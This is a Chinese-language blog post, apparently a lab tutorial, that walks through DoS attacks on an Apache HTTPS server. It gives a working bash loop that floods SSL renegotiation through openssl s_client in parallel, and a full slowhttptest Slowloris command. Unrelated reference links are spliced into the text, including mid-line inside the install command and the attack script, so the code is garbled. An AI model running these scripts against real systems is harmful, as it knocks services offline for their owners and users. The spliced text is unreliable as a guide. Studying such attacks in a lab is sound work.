详细解读DDOS攻击应用

简介: 详细解读DDOS攻击应用

1|00x01 环境

包含3台主机

attact 作为攻击方,使用Centos7.2,安装slowhttptest

server 作为被攻击服务器,安装有apached

windows,用于访问//代码效果参考:http://www.zidongmutanji.com/zsjx/396183.html

server的http及https服务,查看攻击效果

2|00x02 准备

1|01.登录server,安装apached

yum -y install httpd

systemctl start httpd

1|02.登录server,配置ssl

使用openssl生成密钥

openssl genrsa -out server.key 2048

openssl req -new -key server.key -out server.csr

openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt

cp server.crt /etc/pki/tls/certs/

cp server.key /etc/pki/tls/private/

配置apached server

安装apache ssl模块

yum install mod_ssl openssl

修改配置文件,使用我们刚才生成的的证书

vi /etc/httpd/conf.d/ssl.conf

SSLCertificateFile /etc/pki/tls/certs/server.crt

SSLCertificateKeyFile /etc/pki/tls/private/server.key

修改后,重启apached服务

systemctl restart httpd

1|03.登录attact,安装slowhttptest

yum //代码效果参考:http://www.zidongmutanji.com/bxxx/255398.html

-y install slowhttptest

查看帮助

slowhttptest -help

3|00x03 步骤

1|0一、发起SSL慢速攻击

登录attact计算机

shell脚本 ,修改target ip

#!/bin/bash

target=192.168.164.136 # //代码效果参考:http://www.zidongmutanji.com/bxxx/496416.html

IP

port=443

parallel=100

thc-ssl-dosit()

{

while :;

do

(while :; do echo R; done) | openssl s_client -connect $target:$port 2>/dev/null;

done

}

for x in seq 1 $parallel;

do

thc-ssl-dosit

done

给脚本加上权限

chmod 777 ssl.sh

运行脚本,运行后观察CPU使用率。

./ssl.sh

停止脚本

pgrep ssl.sh | xargs kill -s 9

1|0二、Slowloris攻击

注意修改目标IP

slowhttptest -c 1000 -H -g -i 10 -r 200 -t GET -u -x 24 -p 3

参数说明

-c target number of connections

-H

相关文章
|
13天前
|
人工智能 算法 安全
如何构建Tb级DDoS攻击防御体系实现业务零中断?
本文基于NIST与MITRE框架,详解构建Tb级DDoS防御体系的六大核心技术模块,涵盖分布式清洗、智能调度、全栈高可用架构等,助力企业实现业务零中断。
84 0
|
2月前
|
移动开发 网络协议 安全
什么是 DDos 攻击?怎样防 DDos 攻击?
DDoS(分布式拒绝服务攻击)通过大量非法请求耗尽目标服务器资源,使其无法正常服务。常见手段包括SYN Flood、HTTP Flood等。防御方法有流量清洗、集群防护、高防DNS等,阿里云提供专业DDoS高防服务,保障业务稳定运行。
|
6月前
|
边缘计算 网络协议 安全
DDoS攻击:网络世界的“洪峰考验”与应对逻辑
本文介绍了DDoS攻击的运行机制及其影响,并提供了多层次的防御策略。DDoS攻击通过海量流量使目标服务器过载,造成服务中断,对电商和在线平台带来巨大经济损失与用户信任危机。防御措施包括基础设施优化、流量调度及云端协同防护等技术手段。针对中小企业,推荐使用如非凡云提供的弹性防护方案,含200G免费DDoS防御与自动带宽扩容功能,有效降低攻击风险和技术门槛。
615 0
DDoS攻击:网络世界的“洪峰考验”与应对逻辑
|
7月前
|
安全 网络协议 网络安全
DDoS攻击来袭,如何防御DDoS攻击以保障数据安全无忧?
DDoS攻击来袭,如何防御DDoS攻击以保障数据安全无忧?
340 20
|
8月前
|
存储 人工智能 安全
实时拦截攻击并响应威胁,聊聊服务器DDoS防御软件
实时拦截攻击并响应威胁,聊聊服务器DDoS防御软件
235 16
|
10月前
|
监控 负载均衡 安全
什么是DDoS攻击及如何防护DDOS攻击
通过上述防护措施,企业和组织可以构建全面的DDoS防护体系,有效抵御各类DDoS攻击,确保网络和服务的稳定运行。
6741 10
|
12月前
|
网络协议 安全 网络安全
如何识别DDOS攻击模式?
【10月更文挑战第12天】如何识别DDOS攻击模式?
401 18
|
12月前
|
监控 网络协议 网络安全
识别DDoS攻击
【10月更文挑战第12天】识别DDoS攻击
360 16
|
12月前
|
网络协议 安全 网络安全
DDoS攻击有哪些常见形式?
【10月更文挑战第13天】DDoS攻击有哪些常见形式?
1074 14